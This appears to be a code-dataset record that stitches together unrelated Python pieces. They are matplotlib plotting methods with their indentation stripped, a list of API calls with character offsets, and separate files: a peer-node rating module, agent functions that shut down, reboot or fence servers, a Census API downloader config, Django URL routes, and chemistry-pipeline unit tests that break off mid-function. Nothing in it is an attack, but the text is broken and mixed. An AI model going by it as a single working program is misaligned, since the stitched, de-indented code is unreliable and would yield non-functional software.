fig.suptitle('check if the generated imgs match to the test_X slice image')
fig.subplots_adjust(top=0.85)
plt.subplot(1, 2, 1)
plt.gca().set_title('Returned by the dataset class: used for training')
plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.subplot(1, 2, 2)
plt.gca().set_title('Global image holder: used for plotting.')
plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
plt.show()
print('compare:',test_X_sample,test_imgs_sample)
def show_predicted(self, pred_bboxes):
# Show a few images and predicted bounding boxes from the test dataset.
fig = plt.figure(figsize=(12, 3))
fig.subplots_adjust(top=0.85)
fig.suptitle('Prediction demonstration. Random samples.')
legend_plotted = False
for i_subplot in range(1, 11):
plt.subplot(1, 10, i_subplot)
i = np.random.randint(len(pred_bboxes))
plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]):
# print('before convertion: pred',pred_bbox, 'gt',exp_bbox)
pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox)
# exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox)
print('after convertion: pred',pred_bbox, 'gt',exp_bbox)
plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none'))
#gt
plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none'))
plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r')
if not legend_plotted:
legend_plotted = True
plt.gca().legend(['Pred','GT'],loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True)
plt.show()
# plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)
| [
"matplotlib.pyplot.imshow",
"matplotlib.patches.Rectangle",
"matplotlib.pyplot.gca",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.random.randint",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] | [((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\n', (448, 476), True, 'import numpy as np\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\n', (505, 542), True, 'import numpy as np\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\n'), ((1930, 2052), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (1940, 2052), True, 'import matplotlib.pyplot as plt\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (2167, 2282), True, 'import matplotlib.pyplot as plt\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\n extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (3636, 3746), True, 'import matplotlib.pyplot as plt\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(img, cmap='Greys', interpolation='none', origin='lower', extent=\n [0, self.WIDTH, 0, self.HEIGHT])\n", (4154, 4256), True, 'import matplotlib.pyplot as plt\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4759, 4871), True, 'import matplotlib.pyplot as plt\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4986, 5101), True, 'import matplotlib.pyplot as plt\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (4308, 4369), False, 'import matplotlib\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (5631, 5747), True, 'import matplotlib.pyplot as plt\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\n', (693, 735), True, 'import numpy as np\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\n', (773, 792), True, 'import numpy as np\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\n', (830, 850), True, 'import numpy as np\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (3839, 3900), False, 'import matplotlib\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\n'), ((3791, 3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\n pred_bbox[3], ec='r', fc='none')\n", (6179, 6260), False, 'import matplotlib\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '"""b"""', 'fc': '"""none"""'}), "((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\n exp_bbox[3], ec='b', fc='none')\n", (6342, 6419), False, 'import matplotlib\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\n')] |
import pickle
import threading
from bmconfigparser import BMConfigParser
import state
knownNodesLock = threading.Lock()
knownNodes = {}
knownNodesTrimAmount = 2000
def saveKnownNodes(dirName = None):
if dirName is None:
dirName = state.appdata
with knownNodesLock:
with open(dirName + 'knownnodes.dat', 'wb') as output:
pickle.dump(knownNodes, output)
def increaseRating(peer):
increaseAmount = 0.1
maxRating = 1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = min(knownNodes[stream][peer]["rating"] + increaseAmount, maxRating)
except KeyError:
pass
def decreaseRating(peer):
decreaseAmount = 0.1
minRating = -1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = max(knownNodes[stream][peer]["rating"] - decreaseAmount, minRating)
except KeyError:
pass
def trimKnownNodes(recAddrStream = 1):
if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"):
return
with knownNodesLock:
oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]
for oldest in oldestList:
del knownNodes[recAddrStream][oldest]
| [
"bmconfigparser.BMConfigParser",
"threading.Lock",
"pickle.dump"
] | [((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (119, 121), False, 'import threading\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\n', (371, 391), False, 'import pickle\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\n')] |
# Copyright (c) 2018 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
import os
from chroma_agent.lib.shell import AgentShell
from chroma_agent.log import console_log
from chroma_agent.device_plugins.action_runner import CallbackAfterResponse
from chroma_agent.lib.pacemaker import PacemakerConfig
def ssi(runlevel):
# force a manual failover by failing a node
AgentShell.try_run(["sync"])
AgentShell.try_run(["sync"])
AgentShell.try_run(["init", runlevel])
def fail_node():
ssi("0")
def stonith(node):
p_cfg = PacemakerConfig()
# TODO: signal that manager that a STONITH has been done so that it
# doesn't treat it as an AWOL
console_log.info("Rebooting %s per a STONITH request" % node)
p_cfg.get_node(node).fence_reboot()
def shutdown_server(halt=True, at_time="now"):
def _shutdown():
console_log.info("Initiating server shutdown per manager request")
# This will initiate a "nice" shutdown with a wall from root, etc.
AgentShell.try_run(["shutdown", "-H" if halt else "-h", at_time])
console_log.info("Terminating")
os._exit(0)
raise CallbackAfterResponse(None, _shutdown)
def reboot_server(at_time="now"):
def _reboot():
console_log.info("Initiating server reboot per manager request")
# reboot(8) just calls shutdown anyhow.
AgentShell.try_run(["shutdown", "-r", at_time])
console_log.info("Terminating")
os._exit(0)
raise CallbackAfterResponse(None, _reboot)
ACTIONS = [reboot_server, shutdown_server, fail_node, stonith]
| [
"chroma_agent.lib.shell.AgentShell.try_run",
"chroma_agent.lib.pacemaker.PacemakerConfig",
"os._exit",
"chroma_agent.log.console_log.info",
"chroma_agent.device_plugins.action_runner.CallbackAfterResponse"
] | [((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['init', runlevel]"], {}), "(['init', runlevel])\n", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', (["('Rebooting %s per a STONITH request' % node)"], {}), "('Rebooting %s per a STONITH request' % node)\n", (774, 819), False, 'from chroma_agent.log import console_log\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_reboot'], {}), '(None, _reboot)\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server shutdown per manager request"""'], {}), "('Initiating server shutdown per manager request')\n", (955, 1005), False, 'from chroma_agent.log import console_log\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-H' if halt else '-h', at_time]"], {}), "(['shutdown', '-H' if halt else '-h', at_time])\n", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1180, 1195), False, 'from chroma_agent.log import console_log\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1212, 1215), False, 'import os\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server reboot per manager request"""'], {}), "('Initiating server reboot per manager request')\n", (1345, 1393), False, 'from chroma_agent.log import console_log\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-r', at_time]"], {}), "(['shutdown', '-r', at_time])\n", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1523, 1538), False, 'from chroma_agent.log import console_log\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1555, 1558), False, 'import os\n')] |
#! /usr/bin/env python
# -*- coding: utf-8 -*
"""
A base class that governs how to download and process tables from a Census API table.
"""
import os
import logging
import pathlib
from . import geotypes
from . import decorators
logger = logging.getLogger(__name__)
class BaseTableConfig(object):
"""
Configures how to download and process tables from the Census API.
"""
THIS_DIR = pathlib.Path(__file__).parent
PARENT_DIR = THIS_DIR.parent
# All available years
YEAR_LIST = [
2017,
2016,
2015,
2014,
2013,
2012,
2011,
2010,
2009
]
# All available geographies
GEOTYPE_LIST = (
"nationwide",
"regions",
"divisions",
"states",
"congressional_districts",
"state_legislative_upper_districts",
"state_legislative_lower_districts",
"counties",
"places",
"urban_areas",
"msas",
"csas",
"pumas",
"nectas",
"cnectas",
"aiannh_homelands",
"tracts",
"zctas",
"unified_school_districts",
"elementary_school_districts",
"secondary_school_districts"
)
def __init__(
self,
api_key=None,
source="acs5",
years=None,
data_dir=None,
force=False
):
"""
Configuration.
"""
# Set the inputs
self.CENSUS_API_KEY = os.getenv("CENSUS_API_KEY", api_key)
if not self.CENSUS_API_KEY:
raise NotImplementedError("Census API key required. Pass it as the first argument.")
self.source = source
self.force = force
#
# Allow custom years for data download, defaulting to most recent year
#
# If they want all the years, give it to them.
if years == "all":
self.years_to_download = self.YEAR_LIST
# If the user provides a year give them that.
elif isinstance(years, int):
self.years_to_download = [years]
# Or if they provide years as a list, give those then.
elif isinstance(years, list):
self.years_to_download = list(map(int, years))
# If they provided nothing, default to the latest year of data
elif years is None:
self.years_to_download = [max(self.YEAR_LIST), ]
# Validate the years
for year in self.years_to_download:
if year not in self.YEAR_LIST:
error_msg = ("Data only available for the years"
f"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.")
raise NotImplementedError(error_msg)
# Set the data directories
if data_dir:
self.data_dir = pathlib.Path(str(data_dir))
else:
self.data_dir = self.PARENT_DIR.joinpath("data")
self.raw_data_dir = self.data_dir.joinpath("raw")
self.processed_data_dir = self.data_dir.joinpath("processed")
# Make sure they exist
if not self.data_dir.exists():
self.data_dir.mkdir()
if not self.raw_data_dir.exists():
self.raw_data_dir.mkdir()
if not self.processed_data_dir.exists():
self.processed_data_dir.mkdir()
@property
def censusreporter_url(self):
"""
Returns the URL of the Census Reporter page explaining the ACS table.
"""
return f"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/"
#
# Geotype downloaders
#
@decorators.downloader
def download_nationwide(self):
"""
Download nationwide data.
"""
return geotypes.NationwideDownloader
@decorators.downloader
def download_regions(self):
"""
Download data for all regions.
"""
return geotypes.RegionsDownloader
@decorators.downloader
def download_divisions(self):
"""
Download data for all divisions.
"""
return geotypes.DivisionsDownloader
@decorators.downloader
def download_states(self):
"""
Download data for all states.
"""
return geotypes.StatesDownloader
@decorators.downloader
def download_congressional_districts(self):
"""
Download data for all Congressional districts.
"""
return geotypes.CongressionalDistrictsDownloader
@decorators.downloader
def download_state_legislative_upper_districts(self):
"""
Download data for all Census upper legislative districts in the provided state.
"""
return geotypes.StateLegislativeUpperDistrictsDownloader
@decorators.downloader
def download_state_legislative_lower_districts(self):
"""
Download data for all Census lower legislative districts in the provided state.
"""
return geotypes.StateLegislativeLowerDistrictsDownloader
@decorators.downloader
def download_counties(self):
"""
Download data for all counties.
"""
return geotypes.CountiesDownloader
@decorators.downloader
def download_places(self):
"""
Download data for all Census designated places.
"""
return geotypes.PlacesDownloader
@decorators.downloader
def download_urban_areas(self):
"""
Download data for all urban areas
"""
return geotypes.UrbanAreasDownloader
@decorators.downloader
def download_msas(self):
"""
Download data for Metropolitian Statistical Areas.
"""
return geotypes.MsasDownloader
@decorators.downloader
def download_csas(self):
"""
Download data for Combined Statistical Areas.
"""
return geotypes.CsasDownloader
@decorators.downloader
def download_pumas(self):
"""
Download data for Public Use Microdata Areas.
"""
return geotypes.PumasDownloader
@decorators.downloader
def download_nectas(self):
"""
Download data for New England cities and towns.
"""
return geotypes.NectasDownloader
@decorators.downloader
def download_cnectas(self):
"""
Download data for combined New England cities and towns.
"""
return geotypes.CnectasDownloader
@decorators.downloader
def download_aiannh_homelands(self):
"""
Download data for American Indian home lands.
"""
return geotypes.AiannhHomelandsDownloader
@decorators.downloader
def download_tracts(self):
"""
Download data for all Census tracts in the provided state.
"""
return geotypes.TractsDownloader
@decorators.downloader
def download_zctas(self):
"""
Download data for Zip Code Tabulation Areas
"""
return geotypes.ZctasDownloader
@decorators.downloader
def download_unified_school_districts(self):
"""
Download data for unified school districts.
"""
return geotypes.UnifiedSchoolDistrictsDownloader
@decorators.downloader
def download_elementary_school_districts(self):
"""
Download data for elementary school districts.
"""
return geotypes.ElementarySchoolDistrictsDownloader
@decorators.downloader
def download_secondary_school_districts(self):
"""
Download data for secondary school districts.
"""
return geotypes.SecondarySchoolDistrictsDownloader
def download_everything(self):
"""
Download 'em all.
"""
for geo in self.GEOTYPE_LIST:
print(geo)
# Get the downloader function
dl = getattr(self, f"download_{geo}", None)
# Validate it
if not dl or not callable(dl):
raise NotImplementedError(f"Invalid geography type: {geo}")
# Run it
try:
dl()
except NotImplementedError:
pass
| [
"logging.getLogger",
"os.getenv",
"pathlib.Path"
] | [((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (254, 264), False, 'import logging\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (412, 422), False, 'import pathlib\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['"""CENSUS_API_KEY"""', 'api_key'], {}), "('CENSUS_API_KEY', api_key)\n", (1483, 1510), False, 'import os\n')] |
from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^settings$', views.household_dashboard, name='household_dashboard'),
url(r'^myinfo$', views.my_info, name='my_info'),
url(r'^profile$', views.household_profile, name='maintain_household'),
url(r'^members$', views.household_members, name='maintain_members'),
url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'),
url(r'^ajax/models-by-make/(?P<make_id>\d+)/$', views.ajax_models_by_make),
url(r'^ajax/makes-by-type/(?P<type_id>\d+)/$', views.ajax_makes_by_type),
url(r'^ajax/add-make/(?P<type_key>\d+)/(?P<make>[\w ]{1,50})/$', views.ajax_add_make),
url(r'^ajax/add-model/(?P<make_key>\d+)/(?P<model>[\w -]{1,128})/$', views.ajax_add_model),
url(r'^ajax/delete-invite/$', views.ajax_delete_invite),
url(r'^ajax/change-member-status/$', views.ajax_change_member_status),
]
| [
"django.conf.urls.url"
] | [((83, 155), 'django.conf.urls.url', 'url', (['"""^settings$"""', 'views.household_dashboard'], {'name': '"""household_dashboard"""'}), "('^settings$', views.household_dashboard, name='household_dashboard')\n", (86, 155), False, 'from django.conf.urls import include, url\n'), ((162, 208), 'django.conf.urls.url', 'url', (['"""^myinfo$"""', 'views.my_info'], {'name': '"""my_info"""'}), "('^myinfo$', views.my_info, name='my_info')\n", (165, 208), False, 'from django.conf.urls import include, url\n'), ((215, 283), 'django.conf.urls.url', 'url', (['"""^profile$"""', 'views.household_profile'], {'name': '"""maintain_household"""'}), "('^profile$', views.household_profile, name='maintain_household')\n", (218, 283), False, 'from django.conf.urls import include, url\n'), ((290, 356), 'django.conf.urls.url', 'url', (['"""^members$"""', 'views.household_members'], {'name': '"""maintain_members"""'}), "('^members$', views.household_members, name='maintain_members')\n", (293, 356), False, 'from django.conf.urls import include, url\n'), ((363, 432), 'django.conf.urls.url', 'url', (['"""^vehicles$"""', 'views.household_vehicles'], {'name': '"""maintain_vehicles"""'}), "('^vehicles$', views.household_vehicles, name='maintain_vehicles')\n", (366, 432), False, 'from django.conf.urls import include, url\n'), ((439, 513), 'django.conf.urls.url', 'url', (['"""^ajax/models-by-make/(?P<make_id>\\\\d+)/$"""', 'views.ajax_models_by_make'], {}), "('^ajax/models-by-make/(?P<make_id>\\\\d+)/$', views.ajax_models_by_make)\n", (442, 513), False, 'from django.conf.urls import include, url\n'), ((519, 591), 'django.conf.urls.url', 'url', (['"""^ajax/makes-by-type/(?P<type_id>\\\\d+)/$"""', 'views.ajax_makes_by_type'], {}), "('^ajax/makes-by-type/(?P<type_id>\\\\d+)/$', views.ajax_makes_by_type)\n", (522, 591), False, 'from django.conf.urls import include, url\n'), ((597, 688), 'django.conf.urls.url', 'url', (['"""^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$"""', 'views.ajax_add_make'], {}), "('^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$', views.\n ajax_add_make)\n", (600, 688), False, 'from django.conf.urls import include, url\n'), ((688, 784), 'django.conf.urls.url', 'url', (['"""^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$"""', 'views.ajax_add_model'], {}), "('^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$', views\n .ajax_add_model)\n", (691, 784), False, 'from django.conf.urls import include, url\n'), ((784, 838), 'django.conf.urls.url', 'url', (['"""^ajax/delete-invite/$"""', 'views.ajax_delete_invite'], {}), "('^ajax/delete-invite/$', views.ajax_delete_invite)\n", (787, 838), False, 'from django.conf.urls import include, url\n'), ((845, 913), 'django.conf.urls.url', 'url', (['"""^ajax/change-member-status/$"""', 'views.ajax_change_member_status'], {}), "('^ajax/change-member-status/$', views.ajax_change_member_status)\n", (848, 913), False, 'from django.conf.urls import include, url\n')] |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
import qiime2
import os
from q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs
from q2_qemistree import (compute_fragmentation_trees,
rerank_molecular_formulas,
predict_fingerprints)
from q2_qemistree._fingerprint import artifactory
class FingerprintTests(TestCase):
def setUp(self):
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin')
self.goodsirpath = os.path.join(THIS_DIR, 'data/'
'sirius-linux64-headless-4.0.1/bin')
# MassSpectrometryFeatures
self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/sirius.mgf.qza'))
# SiriusFolder
self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/sirFolder.qza'))
# ZodiacFolder
self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR,
'data/zodFolder.qza'))
def test_artifactory(self):
# everything is working fine
obs = os.environ.get('_JAVA_OPTIONS', '')
res = artifactory(self.goodsirpath, ['--help'],
constructor=OutputDirs, java_flags='-Xms2G')
self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS'))
self.assertTrue(isinstance(res, OutputDirs))
# exceptions are raised
with self.assertRaises(OSError):
res = artifactory(self.badsirpath, ['--help'],
constructor=OutputDirs)
def test_fragmentation_trees(self):
ions = self.ions.view(MGFDirFmt)
result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15, profile='orbitrap')
contents = os.listdir(result.get_path())
self.assertTrue(('version.txt' in contents))
def test_fragmentation_trees_negative_ionization(self):
ions = self.ions.view(MGFDirFmt)
result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15, profile='orbitrap',
ionization_mode='negative')
contents = os.listdir(result.get_path())
self.assertTrue(('version.txt' in contents))
def test_fragmentation_trees_exception(self):
ions = self.ions.view(MGFDirFmt)
with self.assertRaises(ValueError):
compute_fragmentation_trees(sirius_path=self.goodsirpath,
features=ions,
ppm_max=15,
profile='orbitrap',
ionization_mode='n3gativ3')
def test_reranking(self):
ions = self.ions.view(MGFDirFmt)
sirout = self.sirout.view(SiriusDirFmt)
